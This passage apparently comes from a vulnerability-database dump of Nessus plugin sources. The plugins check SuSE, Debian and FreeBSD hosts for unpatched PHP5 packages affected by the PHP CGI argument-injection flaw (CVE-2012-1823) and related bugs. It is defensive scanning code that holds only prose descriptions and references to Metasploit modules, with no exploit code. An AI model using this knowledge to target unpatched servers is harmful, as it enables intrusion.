(rpm_check(release:\"SLES11\", sp:1, reference:\"php5-calendar-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ctype-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-curl-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dba-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dbase-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dom-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-exif-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-fastcgi-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ftp-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gd-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gettext-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gmp-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-hash-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-iconv-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-json-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ldap-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mbstring-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mcrypt-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mysql-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-odbc-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-openssl-5.2.14-0.7.30.38.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pcntl-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pdo-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pear-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pgsql-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pspell-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-shmop-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-snmp-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-soap-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-suhosin-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvmsg-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvsem-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvshm-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-tokenizer-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-wddx-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlreader-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlrpc-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlwriter-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xsl-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-zip-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-zlib-5.2.14-0.7.30.38.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 
extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:47:26", "description": "De Eindbazen discovered that PHP, when run with mod_cgi, will\ninterpret a query string as command line parameters, allowing to\nexecute arbitrary code.\n\nAdditionally, this update fixes insufficient validation of upload name\nwhich lead to corrupted $_FILES indices.", "edition": 18, "published": "2012-05-10T00:00:00", "title": "Debian DSA-2465-1 : php5 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2012-05-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:php5"], "id": "DEBIAN_DSA-2465.NASL", "href": "https://www.tenable.com/plugins/nessus/59059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2465. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n script_bugtraq_id(53388, 53403);\n script_xref(name:\"DSA\", value:\"2465\");\n\n script_name(english:\"Debian DSA-2465-1 : php5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"De Eindbazen discovered that PHP, when run with mod_cgi, will\ninterpret a query string as command line parameters, allowing to\nexecute arbitrary code.\n\nAdditionally, this update fixes insufficient validation of upload name\nwhich lead to corrupted $_FILES indices.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2465\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 5.3.3-7+squeeze9.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php-pear\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cgi\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif 
(deb_check(release:\"6.0\", prefix:\"php5-cli\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-common\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-curl\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dbg\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dev\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-enchant\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gd\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gmp\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-imap\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-interbase\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-intl\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-ldap\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mcrypt\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mysql\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-odbc\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pgsql\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pspell\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-recode\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-snmp\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sqlite\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sybase\", reference:\"5.3.3-7+squeeze9\")) 
flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-tidy\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xmlrpc\", reference:\"5.3.3-7+squeeze9\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xsl\", reference:\"5.3.3-7+squeeze9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:13:50", "description": "This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in php5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed.\n bnc#753778", "edition": 18, "published": "2012-05-09T00:00:00", "title": "SuSE 10 Security Update : PHP5 (ZYPP Patch Number 8114)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2012-05-09T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_APACHE2-MOD_PHP5-8114.NASL", "href": "https://www.tenable.com/plugins/nessus/59053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59053);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"SuSE 10 Security Update : PHP5 (ZYPP Patch Number 8114)\");\n 
script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in php5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed.\n bnc#753778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1172.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8114.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-mod_php5-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-bcmath-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-bz2-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-calendar-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ctype-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-curl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, 
reference:\"php5-dba-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-dbase-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-devel-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-dom-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-exif-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-fastcgi-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ftp-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-gd-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-gettext-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-gmp-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-hash-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-iconv-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-imap-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-json-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ldap-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mbstring-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mcrypt-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mhash-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-mysql-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-ncurses-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-odbc-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-openssl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, 
reference:\"php5-pcntl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pdo-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pear-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pgsql-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-posix-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-pspell-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-shmop-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-snmp-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-soap-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sockets-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sqlite-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-suhosin-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sysvmsg-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sysvsem-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-sysvshm-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-tokenizer-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-wddx-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-xmlreader-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-xmlrpc-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-xsl-5.2.14-0.32.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"php5-zlib-5.2.14-0.32.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse 
exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:44:01", "description": "The PHP Development Team reports :\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\nvulnerability in CGI-based setups as originally described in\nCVE-2012-1823. (CVE-2012-2311)\n\nNote: mod_php and php-fpm are not vulnerable to this attack.\n\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\napache_request_headers() (CVE-2012-2329).", "edition": 22, "published": "2012-05-14T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (59b68b1e-9c78-11e1-b5e0-000c299b62e1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "modified": "2012-05-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php53", "p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php52"], "id": "FREEBSD_PKG_59B68B1E9C7811E1B5E0000C299B62E1.NASL", "href": "https://www.tenable.com/plugins/nessus/59084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59084);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\", \"CVE-2012-2329\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (59b68b1e-9c78-11e1-b5e0-000c299b62e1)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP Development Team reports :\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\nvulnerability in CGI-based setups as originally described in\nCVE-2012-1823. 
(CVE-2012-2311)\n\nNote: mod_php and php-fpm are not vulnerable to this attack.\n\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\napache_request_headers() (CVE-2012-2329).\"\n );\n # https://vuxml.freebsd.org/freebsd/59b68b1e-9c78-11e1-b5e0-000c299b62e1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e50f899\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP apache_request_headers Function Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
